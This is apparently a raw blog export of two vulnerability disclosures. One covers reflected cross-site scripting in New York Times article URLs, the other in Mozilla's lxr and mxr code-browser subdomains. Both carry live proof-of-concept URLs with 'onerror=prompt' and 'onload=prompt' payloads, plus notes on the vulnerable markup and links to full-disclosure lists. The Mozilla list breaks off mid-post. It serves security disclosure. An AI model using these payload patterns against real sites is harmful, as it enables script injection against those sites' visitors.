<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-X2QNSQVhDSw/VHaZKvE-lCI/AAAAAAAAAZc/HUw9afmp3Wg/s1600/nytimes_2010_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-X2QNSQVhDSw/VHaZKvE-lCI/AAAAAAAAAZc/HUw9afmp3Wg/s1600/nytimes_2010_xss.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="separator" style="clear: both;">
<a href="http://4.bp.blogspot.com/-MONV6rKFlzE/VHaZKWEGD5I/AAAAAAAAAZY/PbV602hbw4c/s1600/nytimes_2011_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://4.bp.blogspot.com/-MONV6rKFlzE/VHaZKWEGD5I/AAAAAAAAAZY/PbV602hbw4c/s1600/nytimes_2011_xss.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Living POCs Codes:</span></div>
<a data-mce-href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//'%20"><img src=x onerror=prompt(/justqdjing/)>" href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a><br />
<a data-mce-href="%20http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E?pagewanted=all&_r=0" title=" http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0</span></a><br />
<a data-mce-href="%20http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2010/12/07/opinion/07brooks.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a><br />
<a data-mce-href="%20http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2009/08/06/technology/06stats.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a><br />
<a data-mce-href="%20http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2008/07/09/dining/091crex.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a><br />
<a data-mce-href="%20http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)>" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" title=" http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)>"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)></span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=RekCK5tjXWQ">https://www.youtube.com/watch?v=RekCK5tjXWQ</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b><br />
<a href="http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Analysis:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Take the following link as an example,</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" target="_blank">http://www.nytimes.com/2012/<wbr></wbr>02/12/sunday-review/big-datas-<wbr></wbr>impact-in-the-world.html/</a>“><<wbr></wbr>vulnerabletoattack</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">It can see that for the page reflected, it contains the following codes. All of them are vulnerable.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”print”></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>print”>Print</testtesttest?<wbr></wbr>pagewanted=print”></a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”singlePage”></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?<wbr></wbr>pagewanted=all”></a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> </li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPagePageNum2′);” title=”Page 2″ href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>2″>2</testtesttest?pagewanted=<wbr></wbr>2″></a> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPagePageNum3′);” title=”Page 3″ href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>3″>3</testtesttest?pagewanted=<wbr></wbr>3″></a> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a class=”next” onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPage-Next’);” title=”Next Page” href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>2″>Next Page »</testtesttest?pagewanted=2″><wbr></wbr></a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">(3) What is XSS?</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">"Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></div>
<div>
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.</span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Reporter:</span></div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912434010730497">@justqdjing</a>)</span></div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="-webkit-transition: color 0.3s; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div>
<a href="http://lists.openwall.net/full-disclosure/2014/10/16/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/10/16/2</span></a><br />
<a href="http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/xss-vulnerability/new-york-times-xss</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102</span></a><br />
<a href="http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-xss</span></a><br />
<a href="https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1</span></a><br />
<a href="http://webtech.lofter.com/post/1cd3e0d3_6f57c56"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/post/1cd3e0d3_6f57c56</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/2346030512014101270479/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512014101270479/</span></a><br />
<a href="https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-xss</span></a><br />
<a href="http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles-du-new-york-times"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles</span></a><br />
<a href="http://securityrelated.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/10/new-york-times-design.html</span></a><br />
<a href="https://mathfas.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2014/11/01/new-york-times-xss</span></a><br />
<a href="http://computerobsess.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2014/10/new-york-times-design.html</span></a><br />
<a href="http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-in-new-york-times-nyt-published"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-xss</span></a><br />
<a href="http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-xss</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-72049777069978953452015-06-20T02:15:00.000-07:002015-06-20T02:15:44.816-07:00Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)</b></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><span style="font-size: small;"><b>Domains:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">(The two domains above are almost the same)</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>Websites information:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">"lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest‑and‑greatest." (from Mozilla)</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br />"Mozilla is a free-software community which produces the Firefox web browser. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. In addition to the Firefox browser, Mozilla also produces Thunderbird, Firefox Mobile, the Firefox OS mobile operating system, the bug tracking system Bugzilla and a number of other projects." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>(1) Vulnerability description:</b></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;">Mozilla website has a computer cyber security problem. Hacker can attack it by XSS bugs. Here is the description of XSS: "Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">All pages under the following two URLs are vulnerable.</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/mozilla-central/source</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">Since there are large number of pages under them. Meanwhile, the contents of the two domains vary. This makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks to Mozilla's variety class of users.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://4.bp.blogspot.com/-MK2yG3MJWK0/VHVurLywxOI/AAAAAAAAAYU/lvEFHLeHFA0/s1600/mozilla_lxr_2_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="http://4.bp.blogspot.com/-MK2yG3MJWK0/VHVurLywxOI/AAAAAAAAAYU/lvEFHLeHFA0/s1600/mozilla_lxr_2_xss.png" width="400" /></span></a></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://3.bp.blogspot.com/-_1rodokb16Q/VHVurCoEtYI/AAAAAAAAAYg/A-BHu6MpgfQ/s1600/mozilla_mxr_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="http://3.bp.blogspot.com/-_1rodokb16Q/VHVurCoEtYI/AAAAAAAAAYg/A-BHu6MpgfQ/s1600/mozilla_mxr_1_xss.png" width="400" /></span></a></span></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b><br /></b></span></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/" href="http://lxr.mozilla.org/mozilla-central/source/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/mobile/android/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/Android.mk/</a><body onload=prompt("tetraph")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/</a><body onload=prompt("tetraph")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" target="_blank">http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp</a><body onload=prompt("tetraph")></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/" href="http://mxr.mozilla.org/mozilla-central/source/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/webapprt/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/</a><body onload=prompt("justqdjing")></span></div>
<div>
